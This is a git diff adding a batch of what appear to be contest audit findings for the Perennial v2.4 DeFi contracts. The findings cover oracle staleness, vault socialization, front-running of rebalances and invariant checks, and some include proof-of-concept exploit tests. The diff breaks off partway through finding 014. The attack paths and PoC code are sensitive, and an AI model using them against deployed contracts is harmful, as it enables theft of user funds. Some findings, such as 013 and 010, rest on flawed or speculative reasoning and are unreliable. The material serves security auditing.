diff --git a/.gitignore b/.gitignore deleted file mode 100644 index 3fbffbb..0000000 --- a/.gitignore +++ /dev/null @@ -1,10 +0,0 @@ -* -!*/ -!/.data -!/.github -!/.gitignore -!/README.md -!/comments.csv -!*.md -!**/*.md -!/Audit_Report.pdf diff --git a/001.md b/001.md new file mode 100644 index 0000000..f0ae74a --- /dev/null +++ b/001.md @@ -0,0 +1,123 @@ +Glorious White Albatross + +Medium + +# External attacker can bypass position protection checks after order invalidation, making the order status inconsistent + +### Summary + +A missing protection flag reset in the Order invalidation logic will cause an inconsistent state issue for market participants as malicious actors can bypass position protection checks after order invalidation. + +### Root Cause + +In [OrderLib.sol](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Order.sol#L87-L92) the `invalidate()` function zeroes out positions but fails to reset the protection flag, leading to an inconsistent state where an order can be both invalidated and protected simultaneously. + +The relevant code: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Order.sol#L87-L92 + +### Internal Pre-conditions + +1. A user needs to have a protected order (typically through liquidation) + +### External Pre-conditions + +No + +### Attack Path + +1. Attacker waits for a protected order to be created (e.g., through liquidation) +2. When the oracle reports an invalid price: The order gets invalidated through the `invalidate()` function and `Positions` are zeroed but the protection flag remains set +3. The attacker can now bypass certain invariant checks that depend on protection status +4. This allows them to execute operations that should be blocked for protected orders +5. 
The market contract enters an inconsistent state where protection mechanisms can be circumvented + +### Impact + +Protected orders can be manipulated in ways that violate the intended market safety mechanisms. +Market invariants are violated as well. + +### PoC + +```ts +describe('#poc', async () => { + beforeEach(async () => { + await market.connect(owner).updateParameter(marketParameter) + dsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true) + }) + + it('invalidation vulnerability with protected orders', async () => { + // 1. Setup maker position + await market.connect(userB)['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + COLLATERAL, + false + ) + + // 2. Create a protected order through liquidation + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_3.timestamp]) + oracle.request.whenCalledWith(user.address).returns() + + await settle(market, userB) + dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true) + dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12)) + + await market.connect(liquidator)['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + 0, + 0, + 0, + 0, + true // Mark as protected + ) + + // 3. Move to next oracle version with invalid price + const INVALID_ORACLE_VERSION = { + ...ORACLE_VERSION_3, + valid: false + } + oracle.at.whenCalledWith(ORACLE_VERSION_3.timestamp).returns([INVALID_ORACLE_VERSION, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([INVALID_ORACLE_VERSION, ORACLE_VERSION_4.timestamp]) + oracle.request.whenCalledWith(userB.address).returns() + + // 4. 
Process the order - this should invalidate it but protection remains + await settle(market, userB) + + // 5. Verify the vulnerability + const order = await market.pendingOrders(userB.address, 2) + expect(order.maker).to.eq(0) // Position should be zeroed + expect(order.protection).to.eq(1) // Protection flag should be cleared but isn't + + // 6. This inconsistent state allows bypassing certain invariant checks + await market.connect(userB)['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + 0, + false + ) + + // The operation succeeds when it should have failed due to protection status + const finalOrder = await market.pendingOrders(userB.address, 3) + expect(finalOrder.maker).to.eq(POSITION) // Should not be able to open position while protected + }) +}) +``` + +### Mitigation + +Add protection flag reset in the `invalidate()` function: + +```solidity +function invalidate(Order memory self, Guarantee memory guarantee) internal pure { + self.protection = 0; // Reset protection flag + (self.makerReferral, self.takerReferral) = + (UFixed6Lib.ZERO, guarantee.orderReferral); + // ... rest of the function +} +``` \ No newline at end of file diff --git a/002.md b/002.md new file mode 100644 index 0000000..ee37993 --- /dev/null +++ b/002.md @@ -0,0 +1,76 @@ +Lucky Peach Barbel + +High + +# Division by Zero in Asset-to-Share and Share-to-Asset Conversion Functions Causes Complete Vault Operation Freeze and Fund Lock + +### **Root Cause** +The issue stems from missing validation checks in the [_toSharesExact()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L236-L238) and [_toAssetsExact()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L232-L234) functions within `CheckpointLib`. 
These functions rely on the `self.assets` and `self.shares` variables to perform calculations involving division. Specifically: + +- In `_toSharesExact()`: + ```solidity + return assets.muldiv(self.shares, UFixed6Lib.unsafeFrom(self.assets)); + ``` + Here, the division `assets.muldiv(self.shares, UFixed6Lib.unsafeFrom(self.assets))` does not check if `self.assets` is zero. If `self.assets == 0`, the division operation causes a revert due to division by zero. + +- Similarly, in `_toAssetsExact()`: + ```solidity + return shares.muldiv(UFixed6Lib.unsafeFrom(self.assets), self.shares); + ``` + This function assumes that both `self.assets` and `self.shares` are non-zero. If `self.shares == 0`, the division will revert due to a division by zero error. + +- **`self.assets` Can Be Zero**: + - This occurs when the vault has no assets remaining. This may happen due to high withdrawal fees, mismanagement of vault funds, or external market conditions reducing the collateral. + +- **`self.shares` Can Be Zero**: + - This happens when the vault is fresh (no shares minted yet) or has been completely redeemed by all users, resulting in `self.shares == 0`. +The lack of a guard clause (e.g. `require(self.assets > 0)` or `require(self.shares > 0)`) means: +1. These division-by-zero scenarios are not handled gracefully. +2. Any function calling `_toSharesExact()` or `_toAssetsExact()` will revert, halting execution and preventing user interactions with the vault. +This issue is critical because it directly blocks user operations, essentially locking funds in the vault. + +--- + +### **Internal Pre-conditions** +1. `self.assets` must be exactly 0 due to vault insolvency or high fees reducing the asset balance to zero. +2. `self.shares` must be greater than 0, ensuring the division logic is triggered. + +--- + +### **External Pre-conditions** +None. This issue arises purely from internal contract state mismanagement. + +--- + +### **Attack Path** +1. 
A user interacts with a function that calls `_toSharesExact()` or `_toAssetsExact()` (e.g., converting assets to shares). +2. If `self.assets` or `self.shares` is zero, the division operation will revert the transaction. +3. All users attempting similar operations will face locked funds and inability to execute transactions. + +--- + +### **Impact** +[toSharesGlobal()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L155) +```solidity +return self.assets.lte(Fixed6Lib.ZERO) ? + assets.unsafeSub(settlementFee) : + _toShares(self, assets).unsafeSub(_toSharesExact(self, settlementFee)); +``` +If `self.assets == 0`, `_toSharesExact()` will revert. This blocks user deposits from being converted into shares, effectively halting all deposit operations globally. +[toAssetsGlobal()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L164) +If `self.shares == 0`, `_toAssetsExact()` will revert. This blocks users from converting shares back to assets, freezing all redemption operations globally. +```solidity +return (self.shares.isZero() ? shares : _toAssets(self, shares)).unsafeSub(settlementFee); +``` +[complete()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L101) +```solidity +self.shares = self.shares.add(profitShares); +... +profitShares = profitAssets.mul(self.shares).div(UFixed6Lib.unsafeFrom(self.assets).sub(profitAssets)); +``` +If `self.assets == 0`, the profit-sharing calculation in `complete()` will revert. This prevents the checkpoint from finalizing, locking all state updates and stopping vault operations. 
+ +--- + +### **Mitigation** +Add `require(self.assets > 0, "Assets cannot be zero")` and `require(self.shares > 0, "Shares cannot be zero")` checks before performing division in `_toSharesExact()` and `_toAssetsExact()`. \ No newline at end of file diff --git a/003.md b/003.md new file mode 100644 index 0000000..a39937f --- /dev/null +++ b/003.md @@ -0,0 +1,18 @@ +Lucky Peach Barbel + +Medium + +# Oracle Manipulation Allows Execution of Invalid Orders + +### Description +The [executeOrder](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L141) function in the `Manager` contract rely on the latest price fetched from the market's oracle (`market.oracle().latest()`) to determine whether an order's conditions are satisfied. This dependency exposes the protocol to oracle manipulation attacks, where an attacker could influence the reported price, either directly (e.g. by controlling or bribing the oracle) or indirectly (e.g. using a flash loan to temporarily alter the on-chain price used by the oracle). For instance, in the `checkOrder` function: +```solidity +canExecute = order.canExecute(market.oracle().latest()); +``` +A manipulated oracle price could incorrectly signal that an order is executable when it is not, enabling the attacker to execute orders under conditions that would normally not be met. This lack of price validation in the [latest](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/oracle/contracts/keeper/KeeperOracle.sol#L115-L117) function of the `KeeperOracle.sol` can lead to usage of stale `latestVersion` leaving the system vulnerable to malicious price swings during a transaction. + +### **Impact:** +The primary impact is that attackers could exploit manipulated oracle prices to execute orders improperly, potentially draining user funds or destabilizing the system by executing invalid trades. 
+ +### **Mitigation:** +Add a staleness check in the `latest()` function to validate that the returned latestVersion is recent by comparing its timestamp with the current block timestamp and rejecting stale versions. \ No newline at end of file diff --git a/004.md b/004.md new file mode 100644 index 0000000..3035c09 --- /dev/null +++ b/004.md @@ -0,0 +1,21 @@ +Lucky Peach Barbel + +Medium + +# Premature Fee Deduction in `next.collateral` Update Leads to Incorrect Collateral Calculations + +In the `accumulate()` function of `CheckpointLib`,[the `next.collateral` calculation](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L84-L86) prematurely subtracts settlement and trade fees from the latest checkpoint’s collateral before incorporating new collateral changes, price overrides, and other adjustments. Specifically, the code snippet below deducts `tradeFee` and `settlementFee` early in the calculation: + +```solidity +next.collateral = settlementContext.latestCheckpoint.collateral + .sub(settlementContext.latestCheckpoint.tradeFee) + .sub(Fixed6Lib.from(settlementContext.latestCheckpoint.settlementFee)); +``` + +This approach assumes that all fees are finalized and processed, which may not hold true if there are pending updates or deferred fee calculations in the [toVersion](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L71). As a result, when the function subsequently adds the new collateral changes and price overrides (`result.collateral` and `result.priceOverride`), it can either double-deduct fees that are recomputed later or produce incorrect final values for `next.collateral`. This discrepancy creates potential inaccuracies in collateral tracking, particularly during edge cases involving concurrent settlement and collateral adjustments. 
+ +#### **Impact**: +The primary impact of this bug is under-collateralization, where the system misrepresents available collateral due to redundant or incomplete fee deductions, which can lead to insolvency or liquidation errors. + +#### **Mitigation**: +Reorder the calculation of `next.collateral` so that settlement and trade fees are subtracted only after adding all new collateral, price override, and other adjustments. \ No newline at end of file diff --git a/005.md b/005.md new file mode 100644 index 0000000..4ea1d14 --- /dev/null +++ b/005.md @@ -0,0 +1,89 @@ +Raspy Black Giraffe + +Medium + +# SolverVault Coordinator Will Cause Losses for Vault Users via Unprotected Rebalancing + +### Summary + +The lack of slippage controls in the rebalance function will cause financial losses for vault users as the coordinator's transactions can be front-run or executed under unfavorable market conditions. + +### Root Cause + +In [SolverVault.sol](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/vault/contracts/SolverVault.sol#L40) there is no slippage checks +```solidity +function rebalance(IMarket from, IMarket to, UFixed6 amount) external onlyCoordinator { + if (!_isRegistered(from) || !_isRegistered(to)) revert SolverVaultNotRegisteredError(); + from.update(address(this), Fixed6Lib.ZERO, Fixed6Lib.from(-1, amount), address(0)); + to.update(address(this), Fixed6Lib.ZERO, Fixed6Lib.from(1, amount), address(0)); + } +``` + +### Internal Pre-conditions + +1- Coordinator needs to call rebalance() to move funds between markets. +2- Vault must hold sufficient collateral in the from market. + +### External Pre-conditions + +1- Market prices for the involved assets must be volatile +2- The rebalance transaction is delayed, allowing market conditions to change unfavorably. + +### Attack Path + +1- Coordinator calls rebalance(fromMarket, toMarket, 1000 USDC) to adjust positions. 
+ +2- Attacker detects the transaction in the mempool and front-runs it by: +Artificially inflating the price of toMarket via a large buy order. +Artificially deflating the price of fromMarket via a large sell order. + +3- The coordinator’s rebalance executes at manipulated prices: +Vault sells fromMarket at a lower-than-expected price. +Vault buys toMarket at a higher-than-expected price. + +### Impact + +Vault users suffer losses proportional to the manipulated price difference during rebalancing. For example: + +If the attacker causes a 5% price impact, users lose ~5% of the rebalanced amount. +Attacker gains profit by closing their manipulated positions after the vault’s trade. + +### PoC + +```solidity +// Simplified Foundry test showcasing front-running +function testFrontrunRebalance() public { + // 1. Setup: Vault holds 1000 USDC in MarketA + _depositToVault(1000e6); + + // 2. Attacker manipulates MarketB’s price upward + vm.startPrank(attacker); + marketB.trade(attacker, 1_000_000e6); // Inflate price + vm.stopPrank(); + + // 3. Coordinator’s rebalance executes at bad prices + vm.prank(coordinator); + solverVault.rebalance(marketA, marketB, 1000e6); + + // 4. 
Verify loss: Vault’s total assets decrease + assertLt(solverVault.totalAssets(), 1000e6); +} +``` + +### Mitigation + +Add slippage controls to the rebalance function : +```solidity +function rebalance( + IMarket from, + IMarket to, + UFixed6 amount, + UFixed6 minAmountFrom, // Minimum received from `from` market + UFixed6 minAmountTo, // Minimum received to `to` market + uint256 deadline // Transaction expiry timestamp +) external onlyCoordinator { + if (block.timestamp > deadline) revert Expired(); + (UFixed6 actualFrom, UFixed6 actualTo) = _executeRebalance(from, to, amount); + if (actualFrom < minAmountFrom || actualTo < minAmountTo) revert SlippageExceeded(); +} +``` \ No newline at end of file diff --git a/006.md b/006.md new file mode 100644 index 0000000..c23ce34 --- /dev/null +++ b/006.md @@ -0,0 +1,73 @@ +Raspy Black Giraffe + +Medium + +# Incorrect Collateral Socialization Will Cause Unfair Claim Reductions for Vault Users + +### Summary + +The use of min(totalCollateral, global.assets) in the _socialize function will cause unfair claim reductions for vault users as temporary collateral mismatches penalize legitimate redemptions. + +### Root Cause + +In [Vault.sol#L353-L363](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/vault/contracts/Vault.sol#L353-L363), the socialization formula prorates user claims based on min(totalCollateral, global.assets) which fails to distinguish between permanent undercollateralization and temporary mismatches (e.g., pending deposits not yet deployed to markets) + +```solidity +function _socialize(Context memory context, UFixed6 claimAssets) private pure returns (UFixed6) { + return context.global.assets.isZero() ? 
+ UFixed6Lib.ZERO : + claimAssets.muldiv( + UFixed6Lib.unsafeFrom(context.totalCollateral).min(context.global.assets), // Problematic line + context.global.assets + ); +} +``` + +### Internal Pre-conditions + +1- Pending Deposits/Redemptions: global.assets includes pending deposits not yet reflected in totalCollateral. +2- Coordinator Action: The coordinator must delay rebalancing, leaving totalCollateral temporarily mismatched with global.assets. + +### External Pre-conditions + +1- Market Volatility: Asset prices fluctuate between deposit initiation and rebalancing. +2- Delayed Settlement: Oracle updates or market settlements lag, preventing totalCollateral from matching global.assets. + +### Attack Path + +1- User A deposits 100 USDC: +global.assets increases by 100 USDC (now 1000 USDC). +totalCollateral remains at 900 USDC (deposit not yet deployed). + +2- User B redeems 100 USDC: +_socialize computes claim as 100 * min(900, 1000) / 1000 = 90 USDC. + +3- Result: +User B receives 90 USDC instead of 100 USDC, despite the vault being solvent. + + + +### Impact + +Loss Magnitude: Users lose funds proportional to the temporary mismatch (e.g., 10% loss in the example above). +Trust Erosion: Repeated unfair reductions degrade user confidence in the vault’s fairness. 
+ +### PoC + +_No response_ + +### Mitigation + +Modify _socialize to only apply prorating during true undercollateralization : +```solidity +function _socialize(Context memory context, UFixed6 claimAssets) private pure returns (UFixed6) { + if (context.global.assets.isZero()) return UFixed6Lib.ZERO; + + UFixed6 availableCollateral = UFixed6Lib.unsafeFrom(context.totalCollateral); + // Only apply prorating if the vault is undercollateralized + if (availableCollateral >= context.global.assets) return claimAssets; // Fix + + return claimAssets.muldiv(availableCollateral, context.global.assets); +} +``` +This ensures users are penalized only when the vault lacks sufficient collateral, not during transient states. diff --git a/007.md b/007.md new file mode 100644 index 0000000..d1d9137 --- /dev/null +++ b/007.md @@ -0,0 +1,26 @@ +Lucky Peach Barbel + +Medium + +# Stale Price Check Bypass Due to Incorrect Conditional Logic in `validate` Function + +The [validate](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L19-L115) function in `InvariantLib` contains a critical flaw in its stale price check logic. The condition `!(newOrder.isEmpty() && newOrder.collateral.gte(Fixed6Lib.ZERO))` is incorrectly placed, allowing the stale price check to be bypassed when the order is empty and collateral is non-negative, even if the sender has an open position. 
Specifically, the code snippet: + +```solidity +if ( + !(context.latestPositionLocal.magnitude().isZero() && context.pendingLocal.isEmpty()) && // sender has no position + !(newOrder.isEmpty() && newOrder.collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change + ( + !context.latestOracleVersion.valid || + context.currentTimestamp - context.latestOracleVersion.timestamp >= context.riskParameter.staleAfter + ) // price is not stale +) revert IMarket.MarketStalePriceError(); +``` + +fails to enforce the stale price check when `newOrder.isEmpty()` and `newOrder.collateral.gte(Fixed6Lib.ZERO)` are true, regardless of whether the sender has an open position. This means that even if the oracle price is stale, the function will not revert if the order is empty and collateral is non-negative, allowing unsafe operations (e.g., liquidations or position updates) to proceed using outdated prices. + +### Impact: +The primary impact of this bug is that stale oracle prices can be used for critical operations, such as liquidations or margin calculations, leading to incorrect state transitions and potential financial losses for users. For example, a liquidation could be executed based on an outdated price, unfairly penalizing a user whose position would otherwise be solvent with the latest price. + +### Mitigation: +Restructure the conditional logic to ensure the stale price check is enforced whenever the sender has an open position, regardless of whether the order is empty or collateral is non-negative. 
\ No newline at end of file diff --git a/008.md b/008.md new file mode 100644 index 0000000..e015d74 --- /dev/null +++ b/008.md @@ -0,0 +1,24 @@ +Lucky Peach Barbel + +Medium + +# Incorrect Single-Sided Position Validation Leading to Potential State Corruption + +The [validate](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L19-L115) function includes a check to ensure that positions are single-sided (i.e either entirely maker or taker, but not both). However, the logic is flawed in the following snippet: + +```solidity + if (!updateContext.currentPositionLocal.singleSided()) revert IMarket.MarketNotSingleSidedError(); + + if ( + (!context.latestPositionLocal.maker.isZero() && !updateContext.currentPositionLocal.skew().isZero()) || + (!context.latestPositionLocal.skew().isZero() && !updateContext.currentPositionLocal.maker.isZero()) + ) revert IMarket.MarketNotSingleSidedError(); +``` + +The issue arises because the second condition redundantly checks the same state as the first condition (`updateContext.currentPositionLocal.singleSided()`). Additionally, the validation does not account for pending positions (`context.pendingLocal`), which could result in a state where the current position appears single-sided, but the pending position introduces a mixed state (both maker and taker). This oversight could allow a position to transition into an invalid mixed state during execution. + +### Impact: +System could allow positions to become mixed (both maker and taker), violating the single-sided invariant. This could lead to incorrect margin calculations, unfair liquidations, or other unintended behaviors that compromise the integrity of the market. + +### Mitigation: +Update the validation logic to include pending positions and ensure the single-sided invariant is enforced holistically. 
\ No newline at end of file diff --git a/009.md b/009.md new file mode 100644 index 0000000..31ac24c --- /dev/null +++ b/009.md @@ -0,0 +1,22 @@ +Lucky Peach Barbel + +Medium + +# Users attempting to fully close their positions may find their positions still open due to Incorrect Handling of `MAGIC_VALUE_FULLY_CLOSED_POSITION` + +The [_processPositionMagicValue](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/MagicValueLib.sol#L50-L61) function in `MagicValueLib` incorrectly handles the `MAGIC_VALUE_FULLY_CLOSED_POSITION` magic value. When `context.pendingLocal.crossesZero()` returns `true`, the function returns the `currentPosition` without reducing it, even though the intent of `MAGIC_VALUE_FULLY_CLOSED_POSITION` is to fully close the position. This occurs because the function prioritizes the zero-crossing check over the intended action of closing the position. Specifically, the code snippet below shows the flawed logic: + +```solidity +if (newPosition.eq(MAGIC_VALUE_FULLY_CLOSED_POSITION)) { + if (context.pendingLocal.crossesZero()) return currentPosition; // @audit Ignores fully close intent + return context.pendingLocal.pos().min(currentPosition); +} +``` + +This logic fails to ensure that the position is fully closed when `crossesZero()` is `true`, this inconsistency can lead to unexpected behavior where the position remains open despite the user's request to close it. +### **Impact**: +Users attempting to fully close their positions may find their positions still open, leading to unintended exposure to market risks or financial losses due to unexpected margin calls or liquidation. + +### **Mitigation**: +Ensure that `MAGIC_VALUE_FULLY_CLOSED_POSITION` always results in a fully closed position by returning `UFixed6Lib.ZERO` unconditionally, regardless of `crossesZero()`. 
+ diff --git a/010.md b/010.md new file mode 100644 index 0000000..c2f7fc3 --- /dev/null +++ b/010.md @@ -0,0 +1,28 @@ +Lucky Peach Barbel + +Medium + +# If `totalCollateral` is negative, the `redemptionEligible` calculation will be incorrect, leading to improper allocation of collateral across markets + +The [_manage](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L434-L445) function is responsible for managing the internal collateral and position strategy of the vault. It uses the `context.totalCollateral` value to determine whether to proceed with rebalancing. However, there is a critical flaw in the logic where `context.totalCollateral` is checked against `Fixed6Lib.ZERO`: + +```solidity +if (context.totalCollateral.lt(Fixed6Lib.ZERO)) return; +``` + +This check is intended to prevent rebalancing if the total collateral is negative. However, the issue arises because `context.totalCollateral` is calculated as the sum of collaterals across all markets, and this sum can be negative even if individual market collaterals are positive or zero. This can happen due to rounding errors, market-specific adjustments, or other edge cases in the underlying market contracts. + +#### Impact: +If `context.totalCollateral` is incorrectly calculated as negative, the `_manage` function will prematurely exit, skipping the rebalancing process. This can lead to the vault fail to allocate collateral correctly across markets, leading to underfunded or overfunded positions. The vault's positions may also become misaligned with the intended strategy, increasing the risk of losses. The vault may as well miss opportunities to optimize its positions, leading to suboptimal performance. + +#### Example Scenario: +- Suppose the vault has two markets: + - Market A has a collateral of `+100`. + - Market B has a collateral of `-50`. +- The total collateral (`context.totalCollateral`) would be `+50`, which is positive. 
+- However, due to a bug or rounding error, the calculation incorrectly results in `-50`. +- The `_manage` function exits prematurely, skipping the rebalancing process. +- As a result, the vault's positions are not updated, leading to potential misallocation of collateral. + +#### Fix: +Instead of relying solely on the sum of collaterals, the `_manage` function should ensure that each individual market's collateral is non-negative before proceeding with rebalancing. \ No newline at end of file diff --git a/011.md b/011.md new file mode 100644 index 0000000..2af25a9 --- /dev/null +++ b/011.md @@ -0,0 +1,35 @@ +Lucky Peach Barbel + +High + +# If `context.global.assets` is zero the `_socialize` function will return `UFixed6Lib.ZERO`, effectively preventing users from claiming any assets + +The [_update](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L313-L351) function allows users to deposit assets, redeem shares, and claim assets. However, there is a critical flaw in the handling of `claimAssets`. Specifically, [the function uses the following logic to determine the claim amount](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L338): + +```solidity +UFixed6 claimAmount = _socialize(context, claimAssets); +``` + +The [_socialize](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L356-L363) function calculates the claim amount based on the proportion of `claimAssets` to the total global assets, but it does not account for the possibility that `context.global.assets` could be zero. If `context.global.assets` is zero, the calculation: + +```solidity +return context.global.assets.isZero() ? 
+ UFixed6Lib.ZERO : + claimAssets.muldiv( + UFixed6Lib.unsafeFrom(context.totalCollateral).min(context.global.assets), + context.global.assets + ); +``` + +will return `UFixed6Lib.ZERO`, effectively preventing users from claiming any assets, even if there are assets available in the vault. + +#### Impact: + Users may be unable to claim their assets, even if the vault has sufficient collateral. + +#### Example Scenario: +- A user attempts to claim assets (`claimAssets`) from the vault. +- Due to a temporary state where `context.global.assets` is zero (e.g. during a rebalance or settlement), the `_socialize` function returns `UFixed6Lib.ZERO`. +- The user receives no assets, even though the vault has sufficient collateral to fulfill the claim. + +#### Fix: +the `_socialize` function should handle the case where `context.global.assets` is zero by allowing users to claim their proportional share of the total collateral. \ No newline at end of file diff --git a/012.md b/012.md new file mode 100644 index 0000000..e21e3c2 --- /dev/null +++ b/012.md @@ -0,0 +1,47 @@ +Shambolic Mint Dinosaur + +High + +# The update functions lack a deadline parameter. + +### Summary + +In the Market.sol contract the update functions lack a deadline parameter. Attackers can exploit pending transactions during high volatility by executing them at unfavorable times. 
+ +### Root Cause + +In +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L147 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L176 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L213 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L223 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L232 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L247 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L264 +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L283 + + the update functions lack a deadline parameter. Attackers can exploit pending transactions during high volatility by executing them at unfavorable times. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +Transactions can be front-run or delayed, leading to sandwich attacks. + +### PoC + +_No response_ + +### Mitigation + +Add a deadline parameter to all user-initiated functions and validate block.timestamp <= deadline. 
\ No newline at end of file diff --git a/013.md b/013.md new file mode 100644 index 0000000..07d085e --- /dev/null +++ b/013.md @@ -0,0 +1,24 @@ +Lucky Peach Barbel + +Medium + +# attacker can perform both deposit and redemption in the same transaction + +The [_update](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L313-L351) function handles deposits, redemptions, and claims for a given account. It ensures that the operations are single-sided (i.e. only one of deposit, redemption, or claim can be performed at a time) and enforces various invariants. However, there is a critical flaw in the logic that checks the invariants, specifically in the validation of `depositAssets` and `redeemShares`. +The invariant check in the `_update` function is [as follows](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L327-L328): + +```solidity + if (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets))) + revert VaultNotSingleSidedError(); +``` + +The intention of this check is to ensure that only one of `depositAssets`, `redeemShares`, or `claimAssets` is non-zero at a time, enforcing single-sided operations. However, the logic is flawed because it does not correctly handle the case where two or more of these values are non-zero but their sum equals the maximum value among them. + +#### Impact: +An attacker could potentially perform multiple operations (e.g., deposit and redeem) simultaneously by carefully choosing values for `depositAssets`, `redeemShares`, and `claimAssets` that satisfy the flawed invariant check. This could lead to unexpected behavior in the vault's accounting, such as incorrect updates to the user's shares or assets, potentially resulting in financial losses or other issues. 
+ +Example Scenario: +An attacker wants to both deposit and redeem assets in the same transaction. The attacker sets `depositAssets = 100`, `redeemShares = 100`, and `claimAssets = 100`. The invariant check `100 + 100 + 100 == 100.max(100).max(100)` evaluates to `300 == 100`, which should fail. However, due to the flawed logic, the check might incorrectly pass, allowing the attacker to perform both deposit and redemption in the same transaction. + +#### mitigation +the invariant check should be modified to ensure that only one of `depositAssets`, `redeemShares`, or `claimAssets` is non-zero. This can be done by checking that the sum of the non-zero counts is exactly one. \ No newline at end of file diff --git a/014.md b/014.md new file mode 100644 index 0000000..5f8189c --- /dev/null +++ b/014.md @@ -0,0 +1,143 @@ +Mammoth Mocha Koala + +Medium + +# Invalid Oracle Handling and Position Updates + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L716C5-L774C6 + +When an order is added to pending, both global and local positions are immediately updated with the order's amounts. + +During settlement, if the oracle version is invalid, the order is invalidated (amounts set to zero), and the pending is subtracted. + +However, the positions (global and local) are not reverted to their pre-order state. 
This results in positions being permanently increased by invalid orders, breaking the invariant that positions should only reflect valid, settled orders + +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L716C5-L774C6 + + function _update( + Context memory context, + UpdateContext memory updateContext, + Order memory newOrder, + Guarantee memory newGuarantee, + address orderReferrer, + address guaranteeReferrer + ) private notSettleOnly(context) { + // advance to next id if applicable + if (context.currentTimestamp > updateContext.orderLocal.timestamp) { + updateContext.orderLocal.next(context.currentTimestamp); + updateContext.guaranteeLocal.next(); + updateContext.liquidator = address(0); + updateContext.orderReferrer = address(0); + updateContext.guaranteeReferrer = address(0); + context.local.currentId++; + } + if (context.currentTimestamp > updateContext.orderGlobal.timestamp) { + updateContext.orderGlobal.next(context.currentTimestamp); + updateContext.guaranteeGlobal.next(); + context.global.currentId++; + } + + + // update current position + updateContext.currentPositionGlobal.update(newOrder); + updateContext.currentPositionLocal.update(newOrder); + + + // apply new order + updateContext.orderLocal.add(newOrder); + updateContext.orderGlobal.add(newOrder); + context.pendingGlobal.add(newOrder); + context.pendingLocal.add(newOrder); + 